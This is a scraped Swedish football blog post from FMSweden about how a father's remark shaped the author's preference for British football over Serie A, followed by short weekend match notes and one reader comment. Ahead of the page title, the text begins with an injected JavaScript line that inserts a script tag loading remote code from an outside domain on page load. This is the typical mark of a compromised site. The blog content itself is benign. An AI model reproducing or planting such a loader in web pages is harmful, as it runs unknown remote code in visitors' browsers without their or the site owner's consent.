;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Att följa en liga – FMSweden
Meny Stäng

Fabbes blogg: Att följa en liga

Vad är det som gör att man börjar följa en liga mer än en annan? Finns det någon gemensam nämnare?

“Serie A är inget att kolla på, det är bara filmningar och dåligt tempo”. Ungefär så förklarade pappa det för mig som ung, och därav blev det väldigt lite av det italienska fotbollen i min uppväxt. Istället präglades den först av Championship på lördagar i Tipslördag (inte Tipsextra, nej nej, utan TV4:s variant). När vi sedan fick fler kanaler var det Premier League på Canal+ som gällde, och där föddes mitt fotbollsintresse. Sen dess har det alltid varit fotbollen på de brittiska öarna som intresserat mest, även om jag kollar en hel del Bundesliga och La Liga också.

Men visst är det märkligt hur en kommentar av min pappa stöpt mig till den jag är idag, och att jag fortfarande har extremt svårt att njuta av en match i Serie A, om det så är Juventus-Inter som spelar. Det går liksom inte.

Samtidigt finns ni ju där ute, ni som följer Serie A, La Liga eller till och med Bundesliga slaviskt. För några är det givet på grund av ursprung, men sen finns det ju dem av er som bara fastnat för en liga av andra anledningar. Vilka är dessa? Vad är er historia? Berätta! Påminnelser om att man enbart ska följa allsvenskan eller sin lokala klubb undanbedes vänligt men bestämt. 

———————————

I helgen drog Premier League igång igen, och det var en hel del roliga matcher. Liverpool-Leeds behövs ju knappast nämnas, men även Brighton-Chelsea var en underhållande match där Brighton stundtals visade upp fina takter och med lite tur så kunde man fått med sig något. Kul att det är igång igen hur som helst!

———————————

På hemmaplan vann IFK Göteborg äntligen en fotbollsmatch igen, och för den här sidans välmående är det väl på sitt plats med ett grattis till Pontus och Rolles-grabbar.

———————————

För några veckor sedan välkomnade jag Degerfors tillbaka till Allsvenskan. Och efter helgens överkörning har jag aldrig varit säkrare på att vi snart får se bruket tillbaka. Min FM-favorit Villiam Dahlström har gått från division två till Superettan och än så länge stänkt in nio mål och ett antal assist. Det var jag som hittade honom först!

———————————

Det var allt för denna veckan. Glöm inte av att kommentera och berätta era historier om varför ni följer en viss liga mer än andra.

Allt väl!

Please wait...

Liknande Inlägg

2 kommentarer

  1. Ruuutan

    Jag känner likadant, men har gillat kolla på la liga och serie A när tex Henke och Zlatan har spelat i klubbar där. Sedan var Ronaldinho en jag uppskattade att kolla på väldigt mycket när han var som bäst. Men idag kollar jag ingenting på tex barcelona. Däremot kollar jag slaviskt på United och därmed på PL. Tror mycket på att vissa spelare och favoritlag binder en till specifika ligor. Så är det för mig iaf.

Lämna ett svar